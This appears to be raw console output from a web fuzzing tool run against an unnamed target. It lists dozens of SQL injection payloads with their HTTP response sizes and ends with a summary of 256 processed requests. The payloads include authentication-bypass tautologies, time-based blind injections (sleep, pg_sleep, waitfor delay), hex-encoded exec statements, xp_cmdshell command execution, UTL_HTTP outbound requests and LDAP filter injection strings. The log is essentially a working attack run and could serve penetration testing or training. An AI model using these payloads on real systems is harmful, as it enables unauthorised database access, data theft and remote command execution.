[0K[1A[0K000000203:[0m   200     [0m   0 L   [0m   13 W    [0m   127 Ch   [0m   "... or 3=3 --"                                                                                                                                                                                                                                            [0m
000000206:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   ""a"" or 1=1--""                                                                                                                                                                                                                                           [0m
[0K[1A[0K000000205:[0m   200     [0m   0 L   [0m   32 W    [0m   177 Ch   [0m   "or '1'='1'--"                                                                                                                                                                                                                                             [0m
000000199:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "sqlvuln;"                                                                                                                                                                                                                                                 [0m
[0K[1A[0K000000202:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "28 %"                                                                                                                                                                                                                                                     [0m
[0K[1A[0K000000193:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "%2A%28%7C%28mail%3D%2A%29%29"                                                                                                                                                                                                                             [0m
[0K[1A[0K000000197:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "or 1=1 or ""="                                                                                                                                                                                                                                            [0m
[0K[1A[0K000000194:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "+sqlvuln"                                                                                                                                                                                                                                                 [0m
[0K[1A[0K000000195:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "or 1=1 /*"                                                                                                                                                                                                                                                [0m
[0K[1A[0K000000191:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "") or benchmark(10000000,MD5(1))#"                                                                                                                                                                                                                        [0m
[0K[1A[0K000000201:[0m   200     [0m   97 L  [0m   379 W   [0m   4638 Ch  [0m   "x' or 1=1 or 'x'='y"                                                                                                                                                                                                                                      [0m
000000198:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "or 1 in (select @@version)--"                                                                                                                                                                                                                             [0m
[0K[1A[0K000000196:[0m   200     [0m   0 L   [0m   34 W    [0m   193 Ch   [0m   ")) or sleep(__TIME__)='"                                                                                                                                                                                                                                  [0m
000000222:[0m   200     [0m   0 L   [0m   9 W     [0m   64 Ch    [0m   "x' OR full_name LIKE '%Bob%"                                                                                                                                                                                                                              [0m
000000207:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "//*"                                                                                                                                                                                                                                                      [0m
[0K[1A[0K000000190:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "to_timestamp_tz"                                                                                                                                                                                                                                          [0m
[0K[1A[0K000000189:[0m   200     [0m   0 L   [0m   32 W    [0m   184 Ch   [0m   ");waitfor delay '0:0:__TIME__'--"                                                                                                                                                                                                                         [0m
000000209:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "" or 0=0 --"                                                                                                                                                                                                                                              [0m
[0K[1A[0K000000218:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)"                                                                                                                                                    [0m
[0K[1A[0K000000220:[0m   200     [0m   0 L   [0m   32 W    [0m   169 Ch   [0m   "' or 1=1"                                                                                                                                                                                                                                                 [0m
000000219:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)"                                                                                                                                                                         [0m
[0K[1A[0K000000213:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "!"                                                                                                                                                                                                                                                        [0m
[0K[1A[0K000000187:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "password:*/=1--"                                                                                                                                                                                                                                          [0m
[0K[1A[0K000000216:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)"                                                                                                              [0m
[0K[1A[0K000000217:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)"                                                                                                                                                            [0m
[0K[1A[0K000000210:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "")) or pg_sleep(__TIME__)--"                                                                                                                                                                                                                              [0m
[0K[1A[0K000000208:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "%2A%7C"                                                                                                                                                                                                                                                   [0m
[0K[1A[0K000000214:[0m   200     [0m   0 L   [0m   32 W    [0m   171 Ch   [0m   "'"                                                                                                                                                                                                                                                        [0m
000000223:[0m   200     [0m   0 L   [0m   35 W    [0m   215 Ch   [0m   "'; exec master..xp_cmdshell 'ping 172.10.1.255'--"                                                                                                                                                                                                        [0m
000000211:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "?"                                                                                                                                                                                                                                                        [0m
[0K[1A[0K000000225:[0m   200     [0m   97 L  [0m   377 W   [0m   4630 Ch  [0m   "'%20or%20'x'='x"                                                                                                                                                                                                                                          [0m
000000215:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "or a = a"                                                                                                                                                                                                                                                 [0m
[0K[1A[0K000000212:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "or 1/*"                                                                                                                                                                                                                                                   [0m
[0K[1A[0K000000229:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "or 0=0 #""                                                                                                                                                                                                                                                [0m
[0K[1A[0K000000240:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "or"                                                                                                                                                                                                                                                       [0m
[0K[1A[0K000000237:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "or a=a"                                                                                                                                                                                                                                                   [0m
[0K[1A[0K000000239:[0m   200     [0m   0 L   [0m   34 W    [0m   184 Ch   [0m   "'hi' or 'x'='x';"                                                                                                                                                                                                                                         [0m
000000236:[0m   200     [0m   0 L   [0m   32 W    [0m   169 Ch   [0m   "' or a=a--"                                                                                                                                                                                                                                               [0m
000000235:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "or 1=1 or ""="                                                                                                                                                                                                                                            [0m
[0K[1A[0K000000238:[0m   200     [0m   0 L   [0m   34 W    [0m   181 Ch   [0m   "') or ('a'='a"                                                                                                                                                                                                                                            [0m
000000234:[0m   200     [0m   97 L  [0m   379 W   [0m   4635 Ch  [0m   "' or 1=1 or ''='"                                                                                                                                                                                                                                         [0m
000000232:[0m   200     [0m   97 L  [0m   378 W   [0m   4629 Ch  [0m   "' or 1 --'"                                                                                                                                                                                                                                               [0m
000000233:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "or 1=1--"                                                                                                                                                                                                                                                 [0m
[0K[1A[0K000000231:[0m   200     [0m   0 L   [0m   32 W    [0m   169 Ch   [0m   "' or '1'='1'--"                                                                                                                                                                                                                                           [0m
000000230:[0m   200     [0m   0 L   [0m   32 W    [0m   169 Ch   [0m   "' or 1=1--"                                                                                                                                                                                                                                               [0m
000000228:[0m   200     [0m   0 L   [0m   32 W    [0m   169 Ch   [0m   "' or 0=0 #"                                                                                                                                                                                                                                               [0m
000000227:[0m   200     [0m   0 L   [0m   32 W    [0m   169 Ch   [0m   "' or 0=0 --"                                                                                                                                                                                                                                              [0m
000000226:[0m   200     [0m   0 L   [0m   34 W    [0m   181 Ch   [0m   "')%20or%20('x'='x"                                                                                                                                                                                                                                        [0m
000000224:[0m   200     [0m   97 L  [0m   377 W   [0m   4628 Ch  [0m   "'%20or%20''='"                                                                                                                                                                                                                                            [0m
000000241:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "procedure"                                                                                                                                                                                                                                                [0m
[0K[1A[0K000000247:[0m   200     [0m   0 L   [0m   9 W     [0m   59 Ch    [0m   "' or user like '%"                                                                                                                                                                                                                                        [0m
000000243:[0m   200     [0m   0 L   [0m   9 W     [0m   63 Ch    [0m   "' or username like '%"                                                                                                                                                                                                                                    [0m
000000255:[0m   200     [0m   0 L   [0m   34 W    [0m   182 Ch   [0m   "' (select top 1"                                                                                                                                                                                                                                          [0m
000000254:[0m   200     [0m   0 L   [0m   32 W    [0m   170 Ch   [0m   "' or (EXISTS)"                                                                                                                                                                                                                                            [0m
000000256:[0m   200     [0m   0 L   [0m   32 W    [0m   169 Ch   [0m   "'||UTL_HTTP.REQUEST"                                                                                                                                                                                                                                      [0m
000000257:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "1;SELECT%20*"                                                                                                                                                                                                                                             [0m
[0K[1A[0K000000259:[0m   200     [0m   0 L   [0m   32 W    [0m   169 Ch   [0m   "'%20or%201=1"                                                                                                                                                                                                                                             [0m
000000258:[0m   200     [0m   0 L   [0m   32 W    [0m   172 Ch   [0m   "<>"'%;)(&+"                                                                                                                                                                                                                                               [0m
000000251:[0m   200     [0m   0 L   [0m   2 W     [0m   10 Ch    [0m   "--sp_password"                                                                                                                                                                                                                                            [0m
[0K[1A[0K000000249:[0m   200     [0m   0 L   [0m   33 W    [0m   184 Ch   [0m   "'; exec xp_regread"                                                                                                                                                                                                                                       [0m
000000250:[0m   200     [0m   0 L   [0m   35 W    [0m   221 Ch   [0m   "t'exec master..xp_cmdshell 'nslookup www.google.com'--"                                                                                                                                                                                                   [0m
000000253:[0m   200     [0m   0 L   [0m   32 W    [0m   169 Ch   [0m   "' UNION ALL SELECT"                                                                                                                                                                                                                                       [0m
000000252:[0m   200     [0m   0 L   [0m   32 W    [0m   169 Ch   [0m   "' UNION SELECT"                                                                                                                                                                                                                                           [0m
000000245:[0m   200     [0m   0 L   [0m   9 W     [0m   61 Ch    [0m   "' or userid like '%"                                                                                                                                                                                                                                      [0m
000000248:[0m   200     [0m   0 L   [0m   33 W    [0m   193 Ch   [0m   "'; exec master..xp_cmdshell"                                                                                                                                                                                                                              [0m
000000246:[0m   200     [0m   0 L   [0m   9 W     [0m   58 Ch    [0m   "' or uid like '%"                                                                                                                                                                                                                                         [0m

Total time: 0
Processed Requests: 256
Filtered Requests: 173
Requests/sec.: 0

